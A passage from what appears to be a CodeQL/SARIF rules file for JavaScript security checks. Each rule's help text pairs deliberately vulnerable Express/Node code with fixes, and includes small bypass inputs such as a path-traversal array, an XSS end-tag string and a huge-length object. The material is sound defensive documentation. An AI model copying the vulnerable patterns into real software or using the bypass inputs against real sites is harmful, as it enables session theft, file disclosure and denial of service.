attacker."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n","markdown":"# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n"},"properties":{"tags":["security","external/cwe/cwe-614","external/cwe/cwe-311","external/cwe/cwe-312","external/cwe/cwe-319"],"description":"Sending sensitive information in a cookie without requring SSL encryption\n              can expose the cookie to an attacker.","id":"js/clear-text-cookie","kind":"problem","name":"Clear text transmission of sensitive cookie","precision":"high","problem.severity":"warning","security-severity":"5.0"}},{"id":"js/jwt-missing-verification","name":"js/jwt-missing-verification","shortDescription":{"text":"JWT missing secret or public key verification"},"fullDescription":{"text":"The application does not verify the JWT payload with a cryptographic secret or public key."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n","markdown":"# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n"},"properties":{"tags":["security","external/cwe/cwe-347"],"description":"The application does not verify the JWT payload with a cryptographic secret or public key.","id":"js/jwt-missing-verification","kind":"problem","name":"JWT missing secret or public key verification","precision":"high","problem.severity":"warning","security-severity":"7.0"}},{"id":"js/type-confusion-through-parameter-tampering","name":"js/type-confusion-through-parameter-tampering","shortDescription":{"text":"Type confusion through parameter tampering"},"fullDescription":{"text":"Sanitizing an HTTP request parameter may be ineffective if the user controls its type."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n  path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n  var file = req.param(\"file\");\n  if (file.indexOf(\"..\") !== -1) {\n    // BAD\n    // we forbid relative paths that contain ..\n    // as these could leave the public directory\n    res.status(400).send(\"Bad request\");\n  } else {\n    var absolute = path.resolve(\"/public/\" + file);\n    console.log(\"Sending file: %s\", absolute);\n    res.sendFile(absolute);\n  }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n  path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n  var file = req.param(\"file\");\n  if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n    // GOOD\n    // we forbid relative paths that contain ..\n    // as these could leave the public directory\n    res.status(400).send(\"Bad request\");\n  } else {\n    var absolute = path.resolve(\"/public/\" + file);\n    console.log(\"Sending file: %s\", absolute);\n    res.sendFile(absolute);\n  }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n","markdown":"# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n  path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n  var file = req.param(\"file\");\n  if (file.indexOf(\"..\") !== -1) {\n    // BAD\n    // we forbid relative paths that contain ..\n    // as these could leave the public directory\n    res.status(400).send(\"Bad request\");\n  } else {\n    var absolute = path.resolve(\"/public/\" + file);\n    console.log(\"Sending file: %s\", absolute);\n    res.sendFile(absolute);\n  }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n  path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n  var file = req.param(\"file\");\n  if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n    // GOOD\n    // we forbid relative paths that contain ..\n    // as these could leave the public directory\n    res.status(400).send(\"Bad request\");\n  } else {\n    var absolute = path.resolve(\"/public/\" + file);\n    console.log(\"Sending file: %s\", absolute);\n    res.sendFile(absolute);\n  }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n"},"properties":{"tags":["security","external/cwe/cwe-843"],"description":"Sanitizing an HTTP request parameter may be ineffective if the user controls its type.","id":"js/type-confusion-through-parameter-tampering","kind":"path-problem","name":"Type confusion through parameter tampering","precision":"high","problem.severity":"error","security-severity":"9.8"}},{"id":"js/case-sensitive-middleware-path","name":"js/case-sensitive-middleware-path","shortDescription":{"text":"Case-sensitive middleware path"},"fullDescription":{"text":"Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n    if (!req.user.isAdmin) {\n        res.status(401).send('Unauthorized');\n    } else {\n        next();\n    }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n    res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n    if (!req.user.isAdmin) {\n        res.status(401).send('Unauthorized');\n    } else {\n        next();\n    }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n    res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n","markdown":"# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n    if (!req.user.isAdmin) {\n        res.status(401).send('Unauthorized');\n    } else {\n        next();\n    }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n    res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n    if (!req.user.isAdmin) {\n        res.status(401).send('Unauthorized');\n    } else {\n        next();\n    }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n    res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n"},"properties":{"tags":["security","external/cwe/cwe-178"],"description":"Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths.","id":"js/case-sensitive-middleware-path","kind":"problem","name":"Case-sensitive middleware path","precision":"high","problem.severity":"warning","security-severity":"7.3"}},{"id":"js/client-exposed-cookie","name":"js/client-exposed-cookie","shortDescription":{"text":"Sensitive server cookie exposed to the client"},"fullDescription":{"text":"Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n","markdown":"# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n"},"properties":{"tags":["security","external/cwe/cwe-1004"],"description":"Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set.","id":"js/client-exposed-cookie","kind":"problem","name":"Sensitive server cookie exposed to the client","precision":"high","problem.severity":"warning","security-severity":"5.0"}},{"id":"js/loop-bound-injection","name":"js/loop-bound-injection","shortDescription":{"text":"Loop bound injection"},"fullDescription":{"text":"Iterating over an object with a user-controlled .length property can cause indefinite looping."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10<sup>100</sup> iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n    var obj = req.body;\n\n    var ret = [];\n\n    // Potential DoS if obj.length is large.\n    for (var i = 0; i < obj.length; i++) {\n        ret.push(obj[i]);\n    }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n    var obj = req.body;\n    \n    if (!(obj instanceof Array)) { // Prevents DoS.\n        return [];\n    }\n\n    var ret = [];\n\n    for (var i = 0; i < obj.length; i++) {\n        ret.push(obj[i]);\n    }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n","markdown":"# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10<sup>100</sup> iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n    var obj = req.body;\n\n    var ret = [];\n\n    // Potential DoS if obj.length is large.\n    for (var i = 0; i < obj.length; i++) {\n        ret.push(obj[i]);\n    }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n    var obj = req.body;\n    \n    if (!(obj instanceof Array)) { // Prevents DoS.\n        return [];\n    }\n\n    var ret = [];\n\n    for (var i = 0; i < obj.length; i++) {\n        ret.push(obj[i]);\n    }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n"},"properties":{"tags":["security","external/cwe/cwe-834","external/cwe/cwe-730"],"description":"Iterating over an object with a user-controlled .length\n              property can cause indefinite looping.","id":"js/loop-bound-injection","kind":"path-problem","name":"Loop bound injection","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/bad-tag-filter","name":"js/bad-tag-filter","shortDescription":{"text":"Bad HTML filtering regexp"},"fullDescription":{"text":"Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `<script>` tags.\n\n\n```javascript\nfunction filterScript(html) {\n    var scriptRegex = /<script\\b[^>]*>([\\s\\S]*?)<\\/script>/gi;\n    var match;\n    while ((match = scriptRegex.exec(html)) !== null) {\n        html = html.replace(match[0], match[1]);\n    }\n    return html;\n}\n\n```\nThe above sanitizer does not filter out all `<script>` tags. Browsers will not only accept `</script>` as script end tags, but also tags such as `</script foo=\"bar\">` even though it is a parser error. This means that an attack string such as `<script>alert(1)</script foo=\"bar\">` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy &amp; Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n","markdown":"# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `<script>` tags.\n\n\n```javascript\nfunction filterScript(html) {\n    var scriptRegex = /<script\\b[^>]*>([\\s\\S]*?)<\\/script>/gi;\n    var match;\n    while ((match = scriptRegex.exec(html)) !== null) {\n        html = html.replace(match[0], match[1]);\n    }\n    return html;\n}\n\n```\nThe above sanitizer does not filter out all `<script>` tags. Browsers will not only accept `</script>` as script end tags, but also tags such as `</script foo=\"bar\">` even though it is a parser error. This means that an attack string such as `<script>alert(1)</script foo=\"bar\">` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy &amp; Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020","external/cwe/cwe-080","external/cwe/cwe-116","external/cwe/cwe-184","external/cwe/cwe-185","external/cwe/cwe-186"],"description":"Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.","id":"js/bad-tag-filter","kind":"problem","name":"Bad HTML filtering regexp","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/double-escaping","name":"js/double-escaping","shortDescription":{"text":"Double escaping or unescaping"},"fullDescription":{"text":"When escaping special characters using a meta-character like backslash or ampersand, the meta-character has to be escaped first to avoid double-escaping, and conversely it has to be unescaped last to avoid double-unescaping."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Double escaping or unescaping\nEscaping meta-characters in untrusted input is an important technique for preventing injection attacks such as cross-site scripting. One particular example of this is HTML entity encoding, where HTML special characters are replaced by HTML character entities to prevent them from being interpreted as HTML markup. For example, the less-than character is encoded as `&lt;` and the double-quote character as `&quot;`. Other examples include backslash-escaping for including untrusted data in string literals and percent-encoding for URI components.\n\nThe reverse process of replacing escape sequences with the characters they represent is known as unescaping.\n\nNote that the escape characters themselves (such as ampersand in the case of HTML encoding) play a special role during escaping and unescaping: they are themselves escaped, but also form part of the escaped representations of other characters. Hence care must be taken to avoid double escaping and unescaping: when escaping, the escape character must be escaped first, when unescaping it has to be unescaped last.\n\nIf used in the context of sanitization, double unescaping may render the sanitization ineffective. Even if it is not used in a security-critical context, it may still result in confusing or garbled output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation. For URI encoding, you can use the standard `encodeURIComponent` and `decodeURIComponent` functions.\n\nOtherwise, make sure to always escape the escape character first, and unescape it last.\n\n\n## Example\nThe following example shows a pair of hand-written HTML encoding and decoding functions:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n  return s.replace(/&/g, \"&amp;\")\n          .replace(/\"/g, \"&quot;\")\n          .replace(/'/g, \"&apos;\");\n};\n\nmodule.exports.decode = function(s) {\n  return 